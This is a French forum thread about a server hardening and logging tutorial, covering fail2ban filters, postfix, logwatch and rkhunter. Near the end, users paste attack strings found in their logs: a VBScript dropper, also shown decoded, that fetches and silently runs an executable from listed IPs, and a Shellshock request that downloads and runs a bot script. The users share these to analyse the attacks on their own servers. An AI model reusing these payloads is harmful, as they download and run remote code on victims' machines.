Discussion Pour le tuto Sécurisation & Logs V3 : https://mondedie.fr/d/5318-Tuto-Securisation-Logs-V-3-nginx

Un GRAND merci ex_rat Version 2.0 du tuto presque parfaite. J'aurai une question sur la sécurisation SSH, lorsque que on a bloqué le login root et autorise un user perso créé, Il y a un moyen de pouvoir avoir les droits root sur filezilla en sftp avec l'user perso ?

Non. Pour avoir les droits root c'est soit utiliser sudo (pas possible avec filezilla) soit changer l'uid = 0 ce qui revient à renommer le user root en autre chose.

Merci beaucoup pour ce tuto très clair ! Je débute avec mon dédié Kimsufi et j'ai pu tout paramétrer sans problème, beau boulot.

Merci Par contre y'a un os, pas trop embêtant parce que ça risque pas grand chose mais quand même... Je m'étais jamais trop penché sur fail2ban mais la config' pour lighttpd qu'on retrouve sur tout les tuto qui trainent marche pas vraiment. Les 3 fichiers de conf "apache-truc" qu'on utilise en /etc/fail2ban/filter.d/ ne voient rien passer. C'est pour ça qu'on ramasse des bots "myphpadmin" en rafale entre autre. Pareil pour les tentatives d'identification à la porte de rutorrent, ça ban quedale Je teste quelques trucs... Pour l'identification j'ai ça déjà qui marche pas mal même si ça ne ban que si le guignol utilise un pseudo existant sur la box (pas trouvé pour un "toto" mais c'est moins gênant) On édite : nano /etc/fail2ban/filter.d/apache-auth.conf On efface tout et on colle à la place : # Fail2Ban configuration file # for lighttpd htdigest [Definition] # Option: failregex # Notes.: regex to match the password failure messages in the logfile. # Values: TEXT failregex = .*http_auth.*wrong password.*IP: <HOST>\s*$ .*http_auth.*password doesn\'t match.*IP: <HOST>\s*$ # Option: ignoreregex # Notes.: regex to ignore. If this regex matches, the line is ignored. # Values: TEXT ignoreregex = Et on relance fail2ban : /etc/init.d/fail2ban restart J'ai testé c'est ok, je viens de bannir ma mère au bout de 3 tentatives. "Mais t'es sur que je vais pas avoir d'ennuis ?!?" 🙂) J'ai un truc aussi pour les bots phpmyadmin mais j'attends d'avoir plus de retour sur mon test, je manque de pénibles sur le serveur pour l'instant. Votre avis sur la question m’intéresse grandement et si vous pouvez confirmer... Et pas facile "regex" au passage. Ex.

Oui c'est ça, j'ai une regex en stock pour nginx pour ceux qui voudrons passer à nginx quand j'aurais fait le tuto.

Ok je ferais la mise à jour un peu plus tard avec des règles propres. On suit des trucs sans les comprendre et on fait pornawak, c'est malheureux Edit: J'ai corrigé la partie Fail2Ban / Lighttpd avec ajout d'un filtre anti-script, ça marche pas mal du tout Ajout dans la règle anti script de fail2ban d'une ligne anti wootwoot qui marche pas mal du tout.

Bonjour et merci a ex_rat pour ce tuto. Tous c'est parfaitement dérouler, par contre je n'ai pas encore osé toucher la partie sécurité ssh.Du coup j'ai aussi sauté l’étape portsentry. De toute façon je me suis aperçu que dans les mails reçus par fail2ban la plupart des tentatives ont été effectuées sur des ports autre que le 22. J'ai juste 2, 3 questions: - Sur la partie "postfix" pour rediriger les mails vers root a quoi sert pour appliquer les changements `newaliases` Moi j'ai fait `/etc/aliases` modifier en `/etc/newaliases`.Au début j'avais créé un newaliases dans aliases mais cela ne me retourner aucun mail. - Dans la partie "logwatch", on edit le fichier `/usr/share/logwatch/default.conf/logfiles/lighttpd.conf` et on modifie les valeurs. J'ai supprimé la totalité des lignes et j'ai copié les lignes du tuto `LogFile = lighttpd/*access_log......ect` - Et pour finir sur la partie fail2ban mais je crois que du coup c'est bon puisque je reçois les logs par mail sur la création des deux filtres pour Lighttpd.Dans les fichiers, on remplace *HOST* par rien ? Merci.

Salut - Pour ta question sur logwatch, il y a juste l'adresse mail à modifier, le reste des commandes se tape tel quel sans rien changer: nano /etc/aliases Et rajouter à la fin : root: ton_mail@mail.com Tu enregistres la modif' : (ctrl X... Y...) Et après seulement, quand t'es "revenu" sur ta console tu tapes pour valider les changements : newaliases - Pour ta question sur HOST, on laisse comme ça dans les règles sans rien modifier. Par contre, ne fait pas l'impasse sur la sécu SSH, c'est le plus important avec fail2ban, et penses après a modifier le port surveillé par fail2ban pour qu'il fasse son boulot Bon courage Ex.

Salut , je doit bien avoir tous fait car je reçois parfaitement tous les mails. C'est aussi ok pour la partie SSH. Par contre comment supprimer quelques lignes dans le logserver ? Tu compte faire une partie pour AWStats ? ça permet bien de vérifier toutes les adresses ip banni sur le serveur? sudo nano checklist_ban Merci.

Pour AWStats il y avait ça dans l'ancien post sécurité qui est un peu plus bas sur la première page. Mais d'après les commentaires il y avait des soucis donc j'ai pas remis au propre, si quelqu’un a un tuto 100% fonctionnel, qu'il hésite pas Logserver, y'a une rotation du log sur 7 jours, c'est vrai qu'en fin de semaine le fichier est un peu lourd mais c'est pas trop gênant, j'ai pas soluce pour faire plus light mais si quelqu’un a ça et veut faire évoluer le truc avec un script ou autre idée, il est le bienvenue.... Fail2ban utilise Iptables, d'après la faq pour voir les ban en cours: `iptables -L` Pour un log plus parlant voir ici en bas de page: FAQ Fail2ban , faut ajouter des trucs dans les actions de jail.local Après y'a toujours moyen de voir les dernières entrées et suivre ça en live dans fail2ban.log quand y'a rien à la tv : tail -f -n 50 /var/log/fail2ban.log | ccze (toujours avec des jolies couleurs, parce que j'aime bien ! ) Ex.

[Discussion] : Sécurisation & Logs {nginx} {lighttpd} : Page 12

Ce site est optimisé pour être consulté depuis un navigateur moderne dans lequel JavaScript est activé.

[Discussion] : Sécurisation & Logs {nginx} {lighttpd}

cocolabombe0

J'ai une question, j'ai installé le serveur mail par le script et je voulais savoir si on est obligé de faire

apt-get install -f postfix mailutils

pour que cela fonctionne. Je pense que oui vu que cela ne fonctionne pas sinon car la fonction email n'est pas connu ou sinon, il faut modifier la commande a envoyer.
-bash: ail: command not found.

ex_rat

Salut

bash: ail: command not found.
Le m qui manque, c'est ici ou là-bas ?

Le script d'Hardware, installe postfix donc ça doit être bon pour balancer un:

echo 'Salut, je suis un email.' | mail -s 'Hello world' votre_mail@gmail.com

Je pense pas que le "mailutils" change grand chose à ce niveau là
Ex.

cocolabombe0

Erreur de frappe, c'est bien mail. j'ai écrit et pas fait de copie.
Et il ne fonctionne pas en envoyant la commande que tu as recopier.
Donc je peux le lancer sans problème.

blio

Pour le problème de mail à direction de root qui ne fonctionne pas, il est nécessaire d'ajouter dans /etc/postfix/main.cf

mydestination = localhost, votrehostname.votredomaine.ext

Puis

service postfix restart

cocolabombe0

J'ai fais la modification mais l'attribut "mail" n'est pas trouvé pour l'utiliser.

Edit: on peut l'installer sans problème. Vu que la configuration est déjà installer, pas de soucis.
Maintenant, le commande mail fonctionne mais l'attribut root ne marche pas.
Quand j'envois un mail en shell par mon adresse, ca fonctionne mais pas en mettant root.

cocolabombe0

J'ai mis mon adresse en direct sur tous les fichiers et donc cela fonctionne.
Voila mon rkunter car j'ai des warnings et un mail me disant que je suis peut être infecté.

blio

Pour info, pour la page html contenant les différents logs (logserver.sh), j'ai rajouté mon IP en sed -i afin de voir uniquement les données ne concernant pas mes connections, on y gagne en clarté !

cocolabombe0

J'ai une question, j'ai mis mon adresse ip du serveur en ignireip et fais un fail2ban-client reload et j'ai eu comme message sur putty:

WARNING 'findtime' not defined in 'ssh'. Using default value
WARNING 'findtime' not defined in 'dropbear'. Using default value
WARNING 'findtime' not defined in 'pam-generic'. Using default value
WARNING 'findtime' not defined in 'xinetd-fail'. Using default value
WARNING 'findtime' not defined in 'ssh-ddos'. Using default value
WARNING 'findtime' not defined in 'apache'. Using default value
WARNING 'findtime' not defined in 'apache-multiport'. Using default value
WARNING 'findtime' not defined in 'apache-noscript'. Using default value
WARNING 'findtime' not defined in 'apache-overflows'. Using default value
WARNING 'findtime' not defined in 'vsftpd'. Using default value
WARNING 'findtime' not defined in 'proftpd'. Using default value
WARNING 'findtime' not defined in 'pure-ftpd'. Using default value
WARNING 'findtime' not defined in 'wuftpd'. Using default value
WARNING 'findtime' not defined in 'postfix'. Using default value
WARNING 'findtime' not defined in 'couriersmtp'. Using default value
WARNING 'findtime' not defined in 'courierauth'. Using default value
WARNING 'findtime' not defined in 'sasl'. Using default value
WARNING 'findtime' not defined in 'dovecot'. Using default value
WARNING 'findtime' not defined in 'named-refused-tcp'. Using default value
WARNING 'findtime' not defined in 'nginx-auth'. Using default value
WARNING 'findtime' not defined in 'nginx-badbots'. Using default value

Wagner

nano /etc/fail2ban/jail.local

C'est causer par Fail2Ban. Le findtime serait indéfinit pour chaque ou de manière globable (une unique directive pour l'ensemble).

cocolabombe0

Oui mais mon fichier n'a acun findtime. C'est que des bantime que j'ai.

ex_rat

Salut
Jete un oeil aussi dans jail.conf des fois que:

nano /etc/fail2ban/jail.conf

Tu peux mettre tout en haut de ton jail.local, en dessous de bantime=600:

findtime = 3600

(et tu reloads toujours après modif)
Pour que la recherche se fasse sur les 30 dernières minutes par exemple.
Ex.

Wagner

Aucun, cocolabombe0 c'est justement ce qu'il fallait comprendre. Par défaut, le findtime est configuré de manière globable (excepté pour la jail [recidive]). Comme on peut le voir :

# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime = 600

À moins de le spécifier (ou définir) pour chaque jail ([nginx-http-auth] etc), cette directive findtime sera appliquer. Ainsi, pour rectifier ça, il suffira de la rajouter.

PS : Bien entendu, ne pas oublier de rédemarrer Fail2Ban. Comme pour bien d'autres programmes (Nginx etc).
Autrement, j'imagine, il doit s'agir d'une erreur de syntaxe (un # en cause).

Zirf

Bonjour,

Suite à l'ajout de Fail2Ban et logwatch, j'ai reçu par mail (dans mon compte rendu journalier) :

A total of 1 possible successful probes were detected (the following URLs
contain strings that match one or more of a listing of strings that
indicate a possible exploit):

/?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shell%22%29+%3ADS%3DArray%28%22123.108.109.100%22%2C%22123.108.109.100%3A53%22%2C%22123.108.109.100%3A443%22%2C%22178.33.196.164%22%2C%22178.33.196.164%3A53%22%2C%22178.33.196.164%3A443%22%29%3Afor+each+Url+in+DS%3Await%3Dtrue%3Aquit%3Dfalse%3AD%28Url%29%3Aif+quit+then%3Aexit+for%3Aend+if%3Anext%3ASub+D%28Url%29%3Aif+IsObject%28xml%29%3Dfalse+then%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3Aend+if+%3Axml.Open+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fgetsetup.exe%22%2CTrue%3Axml.OnReadyStateChange%3DGetRef%28%22xmlstat%22%29%3Aout%3DNow%3Axml.Send%28%29%3Awhile%28wait+and+60%5E%3Eabs%28datediff%28%22s%22%2CNow%2Cout%29%29%29%3Awscript.sleep%281000%29%3Awend%3AEnd+Sub%3Asub+xmlstat%28%29%3AIf+xml.ReadyState%5E%3C%5E%3E4+Then%3Aexit+sub%3Aend+if%3Await%3Dfalse%3Aif+xml.status%5E%3C%5E
%3E200+then%3Aexit+sub%3Aend+if%3Aquit%3Dtrue%3Aon+error+resume+next%3Aset+sGet%3DCreateObject%28%22ADODB.Stream%22%29%3AsGet.Mode%3D3%3AsGet.Type%3D1%3AsGet.Open%28%29%3AsGet.Write+xml.ResponseBody%3AsGet.SaveToFile+%22ko.exe%22%2C2%3AEnd+sub%3AWshShell.run+%22ko.exe%22%2C0%2C0%3ASet+fso+%3DCreateObject%28%22Scripting.Filesystemobject%22%29+%3Afso.DeleteFile%28WScript.ScriptFullName%29+%26+cscript+22222.vbs.} HTTP Response 200

Mais je ne vois pas comment l'interpréter. J'ai l'impression que la tentative à réussi vu le code response.
Pourriez-vous m'aider ? Merci d'avance.

ex_rat

Salut
J'ai eu exactement le même. J'ai farfouillé sans trouver aucunes modifs ni création de fichiers, rien. Donc je sais pas trop quoi en penser, je pige pas bien le code 200.
J'ai ban le chinois pour la forme en attendant de voir si ça ce reproduit

Au passage, c'est le moment de se mettre à jour: https://www.debian.org/security/2014/dsa-3032

apt-get update
apt-get upgrade

Ex.

Magicalex

ex_rat wrote:je pige pas bien le code 200.
Ex.

Un code 200 http ça veut dire que le serveur web a traitée la requête avec succès.

Nowey

Si on decode l'url ça nous donne un truc du style :

/?search=={.exec|cmd.exe /c echo>22222.vbs dim wait,quit,out:Set xml=CreateObject("Microsoft.XMLHTTP"):Set WshShell = Wscript.CreateObject("WScript.Shell") 😀S=Array("123.108.109.100","123.108.109.100:53","123.108.109.100:443","178.33.196.164","178.33.196.164:53","178.33.196.164:443"):for each Url in DS:wait=true:quit=false😀(Url):if quit then:exit for:end if:next:Sub D(Url):if IsObject(xml)=false then:Set xml=CreateObject("Microsoft.XMLHTTP"):end if :xml.Open "GET","http://"^&Url^&"/getsetup.exe",True:xml.OnReadyStateChange=GetRef("xmlstat")😮ut=Now:xml.Send():while(wait and 60^>abs(datediff("s",Now,out))):wscript.sleep(1000):wend:End Sub:sub xmlstat():If xml.ReadyState^<^>4 Then:exit sub:end if:wait=false:if xml.status^<^
>200 then:exit sub:end if:quit=true😮n error resume next:set sGet=CreateObject("ADODB.Stream"):sGet.Mode=3:sGet.Type=1:sGet.Open():sGet.Write xml.ResponseBody:sGet.SaveToFile "ko.exe",2:End sub:WshShell.run "ko.exe",0,0:Set fso =CreateObject("Scripting.Filesystemobject") :fso.DeleteFile(WScript.ScriptFullName) & cscript 22222.vbs.}

Si ça éclaire une lanterne

Zirf

Désolé pour ma réponse tardive.

D'après Nowey et son décodage de l'url ça à l'air d'être du vb. Donc pour les serveurs sous windows ?

Nowey

Bonsoir bonsoir,

Après passage quotidien dans mes log je viens de trouver une ligne plutot bizarre :

"GET / HTTP/1.0" 200 1966 "-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"

Idem que pour Zirf, un code 200 qui signifie que la requete c'est bien passé...

Dois je m’inquiéter ?

Merci d'avance de vos réponses

Edit : Après quelques recherche je suis tombé sur ce post qui date de hier : http://infosecnirvana.com/shellshock-hello-honeypot/

gsoub

Bonjour tout le monde !

Après avoir suivi ce magnifique tuto afin de sécuriser mon serveur (un énorme merci à ex_rat !), j'ai besoin de vos conseils si vous pouvez m'aider bien entendu

Car comme dit dans le tuto, j'ai des "warnings" avec Rkhunter que je ne sais interpréter, et les voici :

Warning: The command '/usr/bin/unhide.rb' has been replaced by a script: /usr/bin/unhide.rb: Ruby script, ASCII text
Warning: The modules file '/proc/modules' is missing.
Warning: The kernel modules directory '/lib/modules' is missing or empty.

Merci d'avance pour votre aide précieuse !!

Bonne journée.

chris936

Un grand merci !!!
Très bon tuto

J'ai un petit Warning sur Rkhunter :

http://hpics.li/9310fcc

encore merci !

« Page précédente Page suivante »